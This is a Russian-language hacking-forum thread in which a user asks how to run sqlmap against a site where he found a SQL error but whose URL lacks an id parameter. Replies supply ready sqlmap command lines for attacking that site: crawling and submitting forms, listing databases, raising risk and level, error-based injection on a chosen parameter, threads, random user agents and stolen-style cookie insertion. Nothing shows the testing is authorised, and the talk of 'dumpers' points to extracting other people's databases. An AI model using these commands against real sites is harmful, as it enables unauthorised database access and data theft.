Toggle sidebar

Как в Sqlmap прописать url?

  • Автор темы Автор темы Uncle
  • Дата начала Дата начала
U

Uncle

Салам Форумчанам. Прошу помочь по Sqlmap. Суть вопроса. Как прописать url в скл, если на конце не. Php?=id ? Всем спасибо!
 
Uncle сказал(а):
Салам Форумчанам. Прошу помочь по Sqlmap. Суть вопроса. Как прописать url в скл, если на конце не. Php?=id ? Всем спасибо!
Нажмите, чтобы раскрыть...
Ва салам. Ну если не методом GET, передаются данные, то скорее всего POST. Значит с помощью опции --data
Код: 
sqlmap -u "http://site.ru/login" --data="username=admin&password=test"

Подробнее в документации: sqlmapproject/sqlmap
 
Последнее редактирование:
  • Нравится
Реакции: user345, CyberX88, Uncle и ещё 3
Вообще от души Бро))
 
проще заслать запрос через барб сют или web scarab, сохранить его в формате txt и в sqlmap выбрать опцию -r добавить --level=5 --risk=3 тогда еще куки проверяться будут. часто ошибки в них спрятаны.
 
  • Нравится
Реакции: Uncle
Дело в том что мо й вопрос так и остался под грифом,Х)) Суть в том что у меня ошибку sql показывает на пример: https://сайт.ком/list/ а все дамперы в месте с sqlmap не принимают в таком ввиде требуют https://сайт.ком/list/.php?=1
Как сделать чтоб дампер принял ссайт?
 
Uncle сказал(а):
Дело в том что мо й вопрос так и остался под грифом,Х)) Суть в том что у меня ошибку sql показывает на пример: https://сайт.ком/list/ а все дамперы в месте с sqlmap не принимают в таком ввиде требуют https://сайт.ком/list/.php?=1
Как сделать чтоб дампер принял ссайт?
Нажмите, чтобы раскрыть...

sqlmap -u cайт.ком --crawl 2 --batch --form --risk 2 --level 2 --dbs

отредактировал сообщение так как не верно указал параметры.
 
Последнее редактирование:
  • Нравится
Реакции: Uncle
От души Вам! Но почему то --crawl не хочит принимать(( invalid integer value
 
там после --crawl 2 , а не после --batch
 
  • Нравится
Реакции: Uncle и ghostphisher
Да спасибо разобрался)) Всем от Души.
 
  • Нравится
Реакции: ghostphisher и Сергей Попов
А подскажите еще один момент Пожалуйста.
Вот у меня есть ссылка в виде https://сайт.ком/list/, есть правильный набор . в виде sqlmap -u cайт.ком --crawl 2 --batch --form --risk 2 --level 2 --dbs.
А вот как можно разместить запрос по которому уже есть ошибка. Чтоб долго не ждать сканирования
Пример кода:

%22%3Ehead%3Cscript%3Ealert(%27MySQL%20Error ???
 
Последнее редактирование модератором:
Uncle сказал(а):
Так поступить?
Нажмите, чтобы раскрыть...
Ну можно указать вектор атаки.Если у тебя уязвимый параметр id=123 то тогда пишем
-u cайт.ком --risk 3 --level 3 --dbs -p id --threads 10 --random-agent --technique=E(судя по коду ошибки у тебя еррорбасед) --dbms=mysql

если нужны куки на сайт то добавляешь --cookie="сюда вставляешь куки например SSID=adhgajdgsjagsdjkagsdkjasgdjkasdg"

а вообще юзай burp suite
 
  • Нравится
Реакции: Vertigo
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Похожие темы

gurokawa
Проблема Проблема с Vless-клиентами на Arch
Ответы
0
Просмотры
1 тыс.
Общение и нетворкинг
gurokawa
gurokawa
SSSenkoqwa
Заметка путь от завода до DevOps #20
Ответы
0
Просмотры
1 тыс.
Общение и нетворкинг
SSSenkoqwa
SSSenkoqwa
Kot_oo
Writeup Веб [Базовая авторизация] [writeup]
Ответы
0
Просмотры
2 тыс.
HackerLab: практика и соревнования
Kot_oo
Kot_oo
Luxkerr
  • Статья Статья
Статья Red Team против завода: как безопасно моделировать атаки на критическую инфраструктуру
Ответы
0
Просмотры
1 тыс.
Право и комплаенс в ИБ
Luxkerr
Luxkerr
🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →

Популярный контент

🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab

Верх Низ
Назад